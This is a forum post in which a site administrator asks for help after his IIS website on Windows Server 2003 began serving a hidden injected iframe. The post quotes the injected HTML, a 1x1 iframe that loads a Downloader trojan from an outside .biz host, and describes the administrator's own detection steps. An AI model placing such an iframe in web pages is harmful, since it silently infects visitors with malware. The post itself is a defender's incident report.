Our website was compromised sometime in the last few days, but our
Antivirus (Symantec Corporate) when run on the server doesn't detect it.

It is a Windows Server 2003 Standard server, running SP1 and all the
latest patches.  IIS sends down a website to the user with IFRAMEs
injected into the HTML:

<TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG
NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0
></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self
CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php
width=1 height=1></iframe></TD></A></TR></TABLE></TD>

The iframe code above pointing to xaqjlyswly.biz does not come from our
code.  I looked at the ASP function that generates this link and there
is nothing there that would put that on the page.

The iframe tries to get the user's browser to download the Downloader
virus which, according to Symantec "connects to the Internet and
downloads other Trojan horses"

[url]http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99[/u
rl]

My local antivirus on my machine caught downloader getting installed
after browsing the site on the infected server.

I used Agent Ransack to look for the string ".biz" across all our
websites source code.  The string wasn't found anywhere.

That all leads me to believe that something is getting injected into the
code before it is sent to the end user.

I found an older virus that has similar characteristics called
Download.Ject which infected IIS also.  I followed Microsoft's
suggestions for detecting Download.Ject and we don't have it.

Any ideas?

[ Post a follow-up to this message ]